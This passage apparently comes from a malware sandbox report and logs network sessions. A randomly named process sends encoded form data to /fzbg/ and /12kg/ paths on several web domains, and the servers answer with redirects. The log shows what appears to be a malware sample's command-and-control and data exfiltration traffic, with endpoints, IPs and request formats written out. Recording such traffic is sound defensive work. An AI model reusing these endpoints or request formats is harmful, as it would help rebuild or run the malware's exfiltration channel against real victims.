                                                            Data Ascii: vX=jRwSaizXRCVEg08rCRMBr6HEmksC3Uk/gTtK5z4p7NZzrqPkbl9GqPaRosy5LVwP7WdrOR3nI+g0dGMuIVD6AgRJMb2+uNR6gs5JLeC1DfpigdCD7M/dPHw1wDaBRFPQcJryfKJhvJ5BlX5H0XrOtfCkuHzmAJmS3DfBYhkH1vEr7UehEEmVI3faiJ3tfAdY/zOztJ9WoB98WEk73DJHNXjUdPsOpfI5+djkLUMPhANFCDCfxobl2bF5YxGbCsWfnkwhB+boLqD2zGE5NV/3k2IKY59UDHcTK+DwgyGD7TEWYZw0ssAJxzQ787a2WEXsI1+plv9cXKyK2hdfuJVeDGvV48tSzPMNhiPRtkHxkvLTFgq4H6+EltLCGCvYmT6EDQQADefKLi58/MSS8h5Iyw46n/vUxH/8K18bObxCWGRlvL2MAOUzzXw862iHdUTGU5GtXfJ0RpFPw04IfTqtTKqjlwdaWeX9h/q3/iFObANliG9Rf8KfuwrR0tovqablKUU/BNzpk7UKR6le7C6ly28=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.11.20498133.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:00.686530113 CEST2578OUTPOST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 6a 52 77 53 61 69 7a 58 52 43 56 45 67 30 38 72 43 52 4d 42 72 36 48 45 6d 6b 73 43 33 55 6b 2f 67 54 74 4b 35 7a 34 70 37 4e 52 7a 72 63 62 6b 5a 43 68 47 72 50 61 52 6c 4d 79 36 4c 56 77 47 37 51 30 6a 4f 52 72 64 49 38 6f 30 64 51 63 75 4a 67 66 36 46 67 52 45 44 37 32 67 71 4e 52 75 67 73 6b 53 4c 64 2b 44 44 4c 68 69 68 61 75 44 77 66 48 53 44 33 77 7a 77 44 61 4e 56 46 4f 74 63 4a 76 69 66 4b 4e 68 76 4c 4e 42 71 46 78 48 36 67 2f 4f 6b 76 43 6c 37 33 7a 6a 4f 70 6d 33 33 44 4c 56 59 68 6b 35 31 71 38 72 37 55 2b 68 46 43 76 44 49 58 66 61 75 70 33 75 4a 41 52 55 2f 7a 53 72 74 49 4a 57 6f 47 42 38 56 6b 6b 37 6e 32 6c 45 66 33 69 2b 5a 50 74 4f 2b 76 55 78 2b 5a 79 66 4c 52 55 50 68 52 70 46 51 41 36 66 39 70 62 6c 71 72 46 37 47 42 48 66 4c 4d 58 63 6e 6b 68 49 42 36 6e 53 4c 6f 76 32 79 6b 63 35 66 6b 2f 30 7a 6d 49 41 58 5a 38 4f 48 48 51 66 4b 2b 53 79 67 79 47 54 37 52 6f 57 59 49 41 30 74 6f 64 66 38 44 51 34 6e 72 62 73 63 6b 62 69 49 31 53 68 6c 75 46 32 58 4d 2b 4b 32 42 64 [TRUNCATED]
                                                            Data Ascii: vX=jRwSaizXRCVEg08rCRMBr6HEmksC3Uk/gTtK5z4p7NRzrcbkZChGrPaRlMy6LVwG7Q0jORrdI8o0dQcuJgf6FgRED72gqNRugskSLd+DDLhihauDwfHSD3wzwDaNVFOtcJvifKNhvLNBqFxH6g/OkvCl73zjOpm33DLVYhk51q8r7U+hFCvDIXfaup3uJARU/zSrtIJWoGB8Vkk7n2lEf3i+ZPtO+vUx+ZyfLRUPhRpFQA6f9pblqrF7GBHfLMXcnkhIB6nSLov2ykc5fk/0zmIAXZ8OHHQfK+SygyGT7RoWYIA0todf8DQ4nrbsckbiI1ShluF2XM+K2Bdfrq9ZJ2vSxcsV9vMghiDntmrhjezTXga4Dq+HjNLGfyvktz6EDQcUDeTKLTB8tOaSsCRIpw4Gn/uaxHzHK114ObgvWF9lveaMDPUw3nwz+2icZUPVU5alXblkSbBPx0oIODqsRqq41gcZSebhh/2N/iZkbDdliBY1PdOX4W37pfg1rZ7bGmY2Otj3nO8JeYFVrBTmnSylrQ6z2vO9lkPId30AqLq0VlZkNMZjYtzhCRWQNTCEROyZU87nC/rjGjnqkIWADnR9eLQfJkysL/bLvPCP3k8lWnbS+5vS8maCpeYmhvSNeClqumm0pZoImufBzh466GtX/8ZA/FEx6jCz4lIUxlP+fkZxx5xnOxuoc5+UtU9fv24/qlHwwsYjnt+CMPxjHJsH4E1ykTJ2hdM5/xjkjYva8JIUbb3KIAKVDWsoEb1gmA6SBl516xZ8NIdGyp0+VoiSpUTHE5rBObfeFM5YuWU4UVP4vzAlHD5sgaOUhRyN4gMCf9YWo13braOzj7jXukLTT4b2aoI1fdrt+1DekbzOx5i9PgVGOnOuwlGc0WUU7xmK4Z74wzJuq0Yqh69WOdzdIstSLhju0YdK3yjZraNYkns8ie6cN8s+1ES/ns5WP18FRuC0d8BlunzSe1xaxtCSwznAfVeV5eLOKMZTP8UC98btM [TRUNCATED]
                                                            Jul 3, 2024 17:39:00.686599016 CEST10312OUTData Raw: 2f 79 6d 6d 4f 43 56 59 56 39 59 42 6a 38 31 4f 73 46 5a 2f 72 76 6f 44 52 69 75 59 37 31 74 4d 51 64 30 6c 6b 6e 44 57 76 53 4d 47 48 39 76 43 51 69 61 55 30 6d 32 59 68 49 70 30 2b 6f 4e 51 44 44 52 48 78 41 55 42 4e 4a 6a 33 77 64 33 79 7a 56
                                                            Data Ascii: /ymmOCVYV9YBj81OsFZ/rvoDRiuY71tMQd0lknDWvSMGH9vCQiaU0m2YhIp0+oNQDDRHxAUBNJj3wd3yzVaLs6KeR6Am2syyf7mydDxx+8B9bpRYZgnyE0b16FxCocWndzDWQqCktlSAveob5Z7ncHV0EhVG7a/B4kT49H7IR8fBLTlqJo/e5Gbl6UlYwkp9JBDpXbRJTcMOSZ2XBOndJRWW5zxrtccXVpktSboB8/BH9z7zgfn
                                                            Jul 3, 2024 17:39:00.805247068 CEST2578OUTData Raw: 63 6a 45 59 75 32 41 36 39 72 49 36 36 33 54 74 52 56 75 61 6d 68 39 79 55 6c 6c 76 31 61 6e 53 64 4d 6f 6b 78 44 43 6c 51 44 56 65 43 41 6f 57 4e 74 38 75 4f 4f 66 68 49 31 67 36 6b 46 74 6c 44 76 5a 30 76 63 55 6c 34 61 6b 42 56 4a 46 35 4f 42
                                                            Data Ascii: cjEYu2A69rI663TtRVuamh9yUllv1anSdMokxDClQDVeCAoWNt8uOOfhI1g6kFtlDvZ0vcUl4akBVJF5OBHsaMWcebCwXJtmnRUvYFLuvvaZYROqCz6p7wQdx4Yu+lFevmu6O2e1ZnTRByKBNrN8fS3+aALPLp+utzfJ7paIhQRIqBPss1W3JF+THskh5NOElN+ouPVK31Bzdcky3yzKijkQtw3KTnP7PaFUDejts/l3nkrcZDS
                                                            Jul 3, 2024 17:39:00.805408955 CEST1289OUTData Raw: 62 68 2f 31 6a 70 35 49 31 32 6a 30 59 45 33 53 73 79 79 32 53 32 30 71 61 46 67 4c 39 68 75 6e 45 6a 2b 66 2b 43 4a 66 48 47 51 56 45 45 7a 45 4f 6c 57 4c 44 58 6d 73 41 67 54 76 48 57 6d 6b 77 76 45 4a 39 50 6d 2f 79 41 30 39 30 6f 49 6c 78 5a
                                                            Data Ascii: bh/1jp5I12j0YE3Ssyy2S20qaFgL9hunEj+f+CJfHGQVEEzEOlWLDXmsAgTvHWmkwvEJ9Pm/yA090oIlxZDv5av3UpneNzxFRE7bDSs4SyP6GOjmPqIJtZPh/7ag/TdVnZDQGjBHvl5S0Pxxjc+IeBz33ATGkbXsvX3oBeWddjXTyiLkpBUUaBi0lT4CLyaCkEB1sHhduIIaxyfn588HqqYeInGzE9bNNlOiGTKfzpexRShDKsM
                                                            Jul 3, 2024 17:39:00.805560112 CEST18046OUTData Raw: 4f 37 66 38 52 76 4c 31 35 41 2b 58 6a 67 6e 65 63 72 35 6e 4a 4f 2f 62 41 6d 56 46 2b 58 64 4a 51 6c 2b 39 53 6b 31 44 67 77 50 2f 71 43 57 57 52 65 31 6c 6d 33 48 52 56 38 36 73 53 55 59 6b 64 54 6d 4e 32 6b 4c 59 37 30 41 30 71 61 31 72 4e 37
                                                            Data Ascii: O7f8RvL15A+Xjgnecr5nJO/bAmVF+XdJQl+9Sk1DgwP/qCWWRe1lm3HRV86sSUYkdTmN2kLY70A0qa1rN7Qb0/MWictVTFdRizQDHRKyOB5AM4r1z+bMmU24xec3BjwA7+XtblwJWiA5vjKfPDqyGC71brcyLudKAVUm//LIqT7x90/Pdh60LJpngywusGXZMhLmBhlIHX/l6I6TNb1F4DbRYBVvOBzlqG/Zk/pJr2ERc1sB5o1
                                                            Jul 3, 2024 17:39:00.805762053 CEST3867OUTData Raw: 46 54 44 70 6d 4c 63 4e 67 64 56 70 68 66 58 43 36 66 76 55 74 46 78 48 73 66 6c 4f 39 36 41 66 67 68 36 34 5a 63 77 72 43 4e 55 6d 64 4e 33 51 4a 4f 4a 76 30 31 34 68 77 6b 4c 6e 67 59 4c 30 62 6e 6d 50 77 31 61 45 6e 6a 51 55 4f 66 2b 2b 68 63
                                                            Data Ascii: FTDpmLcNgdVphfXC6fvUtFxHsflO96Afgh64ZcwrCNUmdN3QJOJv014hwkLngYL0bnmPw1aEnjQUOf++hcDgGBbL32QMxQLUnm12vkJWHD+SHMVlEFoqXV5eIYG73Nzj+idmDOrqaa2iiSriVLML59IlzphVAYgfvns3lUGOwFPiA5/LOzlpxW4jQKFRI+VBA29BgPmU5JLA/mr8By/BEf+VRbCNPfqurg3ZDJYNuvqQN0NKB5H
                                                            Jul 3, 2024 17:39:00.924052000 CEST2578OUTData Raw: 38 6a 79 42 2b 2b 78 52 58 4c 47 4f 6a 61 68 41 47 46 79 71 41 30 59 72 4f 63 32 51 56 41 53 31 63 6e 70 4a 35 4c 69 48 76 30 51 56 42 71 74 62 34 54 56 62 67 58 45 58 43 31 70 75 4b 4c 7a 35 7a 46 37 32 72 68 31 59 61 4e 6d 52 6e 52 33 67 41 38
                                                            Data Ascii: 8jyB++xRXLGOjahAGFyqA0YrOc2QVAS1cnpJ5LiHv0QVBqtb4TVbgXEXC1puKLz5zF72rh1YaNmRnR3gA8dVXH8Edm5M3ApxIHjA9nKWMevXocya4Dvm7ZkA6Yj8WMWXI4Bps4twx2AFXFwRWE+YWnpVSOeKObw+SVzo+wBpwZJMSjwOSkTDvubgsZgwPmgPdnpg/01HUEKcKPjEFj5E7kcBFAVBJuUfoJgP4DkN/8IRRNeHX1n
                                                            Jul 3, 2024 17:39:00.924177885 CEST1289OUTData Raw: 76 50 59 32 75 43 5a 4e 57 51 79 38 2f 78 58 61 45 6a 75 4d 63 37 44 44 34 41 69 37 55 4b 2f 49 4d 36 68 33 6a 68 76 62 77 55 6b 77 37 36 32 2b 74 49 6f 75 7a 54 41 65 33 6d 57 33 67 33 44 79 33 42 63 49 70 79 33 6e 46 2b 51 62 71 2f 36 68 38 45
                                                            Data Ascii: vPY2uCZNWQy8/xXaEjuMc7DD4Ai7UK/IM6h3jhvbwUkw762+tIouzTAe3mW3g3Dy3BcIpy3nF+Qbq/6h8EmXKlJd3kj6K+CiWDFTpgY23ZNIQQg+jLF8Bp1fe4NPxk6P41SUK5J6DbMuQBoJdR8fzkUsIBXX1jCW+kssK8ivtigH62YPMh/aLQ/j86wkICfoEbdHm1N656B/TnmogGWikDdXYKum+RXq+GlxAQ0WAnw51vVWDBd
                                                            Jul 3, 2024 17:39:00.924257994 CEST2578OUTData Raw: 2f 6e 57 43 51 72 71 4a 48 49 58 4e 37 2b 46 75 59 50 48 78 74 58 51 41 63 6c 56 4e 49 70 66 68 51 6c 43 71 4b 46 6b 63 4c 41 52 50 6e 41 46 52 69 47 48 4e 63 6a 4b 51 54 6b 73 68 5a 57 45 35 31 61 2f 4f 67 43 48 6a 76 35 4b 48 49 65 42 74 54 31
                                                            Data Ascii: /nWCQrqJHIXN7+FuYPHxtXQAclVNIpfhQlCqKFkcLARPnAFRiGHNcjKQTkshZWE51a/OgCHjv5KHIeBtT1eY1PVEPi4BL38MumL8VHAB2GNaez3MBlAEbRR4FBs4qB8oUHycrTYZkLLYOhNDueGYZRXW13TVuy0QnPeKuSyyFGlbzlIz7hOUiZt0Ipn5DDIi5htmfriX5pWF6qFuGDUfjHkdqa1v0BuXm+I+FENlAqOVJZfGfdR
                                                            Jul 3, 2024 17:39:00.924424887 CEST1289OUTData Raw: 4f 36 6d 65 77 58 48 4a 63 51 63 78 59 59 6a 49 49 37 46 69 4a 53 68 45 6f 37 51 47 73 4c 57 31 30 59 67 45 6e 73 48 72 46 43 31 7a 47 4a 52 74 70 37 30 73 53 71 65 57 75 55 55 30 58 54 4d 59 6f 4e 6e 34 4a 62 51 77 5a 4d 56 59 32 52 59 36 6f 6b
                                                            Data Ascii: O6mewXHJcQcxYYjII7FiJShEo7QGsLW10YgEnsHrFC1zGJRtp70sSqeWuUU0XTMYoNn4JbQwZMVY2RY6ok3b4cN476t1TKYi93NCVEnlQmeE4tFGqaJ/g6G+p87HE/0gk2BVkAUf0x8bwbKTpNp65lBprpqkzZ0Tkyy9oDo4yjnukZeKSDJJVyGWZMNvw2EMCOy5IkIs0Vu+y9ZHn+UjEgKTN/ZrUZnBlA4HQeOIcsyjO0QCiKe
                                                            Jul 3, 2024 17:39:00.924580097 CEST7138OUTData Raw: 73 6e 54 34 7a 62 67 39 48 73 62 71 75 64 48 34 73 56 4f 44 4c 37 2b 57 6e 6b 78 73 44 68 49 58 53 47 6d 51 46 66 71 43 58 4d 77 6a 63 35 71 49 4c 42 6e 66 45 66 53 54 2b 57 78 6e 53 6e 65 6c 2b 63 77 35 77 78 6c 43 35 2f 39 56 62 52 38 48 6f 44
                                                            Data Ascii: snT4zbg9HsbqudH4sVODL7+WnkxsDhIXSGmQFfqCXMwjc5qILBnfEfST+WxnSnel+cw5wxlC5/9VbR8HoDTxGoprHtSO37+A+JSLJz5KtGV3P8GtsZNa8pNSQvmuPWYg0f61WC/7B/Yiw3QEsYRlrqdtjUiYXsfbkDV2e8EC1Y7v6y4xjS9BKH6gdFieGsHeixBLdBFQvgseAbfPORfg0ndZuWisEwFkgDovyyoTbQtTPbIODZ0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.11.20498143.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:03.353831053 CEST530OUTGET /fzbg/?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:03.495410919 CEST397INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:39:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 58 3d 75 54 59 79 5a 53 4f 74 50 42 56 4c 30 68 49 73 4b 67 70 69 39 35 48 51 74 56 45 72 37 52 78 45 31 47 74 66 68 69 51 67 7a 74 30 30 79 70 33 70 51 48 5a 2f 79 64 75 71 6d 66 58 50 44 51 30 78 38 68 4d 31 49 32 79 37 4d 4e 78 51 52 48 56 49 45 33 50 6b 50 44 6c 62 41 4d 75 53 73 76 56 2f 67 50 39 50 54 2f 65 5a 54 4a 70 79 6b 39 6e 49 34 4a 79 6e 45 32 67 3d 26 5f 42 37 3d 4c 78 79 78 57 72 6a 38 6b 72 69 30 67 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.11.204981584.32.84.192807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:17.207076073 CEST785OUTPOST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 50 62 46 2f 47 43 73 31 35 58 68 39 78 6e 6e 74 2b 4c 2f 4c 52 57 33 47 42 6c 34 51 48 35 36 6f 74 57 6b 6e 59 51 6e 48 58 33 70 79 69 6c 6b 45 62 58 68 66 59 7a 65 2b 77 34 67 39 2f 39 65 67 47 6c 57 58 32 57 54 65 63 78 67 47 76 68 76 4c 32 5a 47 73 71 69 45 6e 6d 6c 68 66 37 73 73 42 42 67 42 58 78 31 6b 48 4d 63 73 4c 6b 33 54 62 48 33 6e 33 5a 53 39 39 6c 32 6c 30 6b 45 37 6e 66 68 6e 4e 49 33 5a 30 7a 4a 55 64 58 39 4e 44 57 43 71 6f 69 65 68 43 67 65 63 68 46 44 55 66 4f 70 51 4c 71 5a 4b 4e 59 78 72 6f 33 4b 6c 6f 61 64 7a 4c 68 59 32 55 6c 7a 43 4f 6f 56 49 46 67 3d 3d
                                                            Data Ascii: vX=IPbF/GCs15Xh9xnnt+L/LRW3GBl4QH56otWknYQnHX3pyilkEbXhfYze+w4g9/9egGlWX2WTecxgGvhvL2ZGsqiEnmlhf7ssBBgBXx1kHMcsLk3TbH3n3ZS99l2l0kE7nfhnNI3Z0zJUdX9NDWCqoiehCgechFDUfOpQLqZKNYxro3KloadzLhY2UlzCOoVIFg==
                                                            Jul 3, 2024 17:39:18.127497911 CEST1211INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 3b7db2fe631920e3f27fa80e3000aa47-asc-edge6
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.644
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.11.204981684.32.84.192807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:39:20.021413088 CEST1125OUTPOST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 50 62 46 2f 47 43 73 31 35 58 68 2f 51 33 6e 76 66 4c 2f 61 78 57 30 66 42 6c 34 65 6e 35 2b 6f 74 71 6b 6e 61 38 33 48 46 6a 70 79 43 31 6b 46 5a 76 68 65 59 7a 65 6d 41 34 68 77 66 39 4a 67 47 35 6f 58 30 53 54 65 66 4e 67 48 65 42 76 4b 47 5a 42 6a 36 69 48 67 6d 6c 67 62 37 73 69 42 42 73 37 58 7a 4a 6b 47 38 77 73 4b 68 62 54 52 32 33 6d 7a 35 53 42 32 46 32 36 2b 45 45 6c 6e 66 39 46 4e 4a 66 6a 30 68 56 55 65 7a 78 4e 43 57 43 70 69 53 65 71 4d 77 66 6f 73 32 32 62 52 4f 52 7a 4e 34 4a 69 42 5a 74 54 6e 6d 57 66 78 35 31 33 58 44 59 75 56 33 58 56 41 4d 59 44 62 6a 6b 52 78 4c 4a 35 71 58 68 5a 31 34 58 75 49 38 68 34 48 39 63 42 65 42 54 35 5a 70 57 78 4b 61 59 53 67 31 5a 53 53 66 57 2b 6c 6e 43 31 41 75 52 69 2f 74 63 4c 6b 74 68 42 6b 32 62 58 54 50 52 53 66 4d 30 38 52 2f 39 54 42 42 50 76 59 5a 48 53 78 41 50 66 34 51 64 4c 4e 71 35 72 71 6e 2f 61 6e 46 53 56 47 6c 47 77 56 6d 66 39 31 79 75 4a 4d 73 55 45 63 32 6c 5a 6c 50 45 38 4c 6d 53 6b 32 30 69 71 43 31 43 52 72 45 2b [TRUNCATED]
                                                            Data Ascii: vX=IPbF/GCs15Xh/Q3nvfL/axW0fBl4en5+otqkna83HFjpyC1kFZvheYzemA4hwf9JgG5oX0STefNgHeBvKGZBj6iHgmlgb7siBBs7XzJkG8wsKhbTR23mz5SB2F26+EElnf9FNJfj0hVUezxNCWCpiSeqMwfos22bRORzN4JiBZtTnmWfx513XDYuV3XVAMYDbjkRxLJ5qXhZ14XuI8h4H9cBeBT5ZpWxKaYSg1ZSSfW+lnC1AuRi/tcLkthBk2bXTPRSfM08R/9TBBPvYZHSxAPf4QdLNq5rqn/anFSVGlGwVmf91yuJMsUEc2lZlPE8LmSk20iqC1CRrE+h0agVhXGV5Mrc+pfdah4Q1We/RLyYG/TsVj40t4hh//NMp1UJpV/YyikXy6S436Yh8B6pY03NdC4DZuwCkdp+CgUKCp94dttGQrPHm/qQUVg5/2iK5bpDv+rYq4CC/Dg1OW8Pqn3Kp3CRw5OVaSc3EB3MAdFtWx6SKA+z87UytvnZR94giawwLhHp/xJASQpuLgO5soI=
                                                            Jul 3, 2024 17:39:20.926676989 CEST1211INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: d98ea308764777e3b09062362b1f36ca-asc-edge4
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.641
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
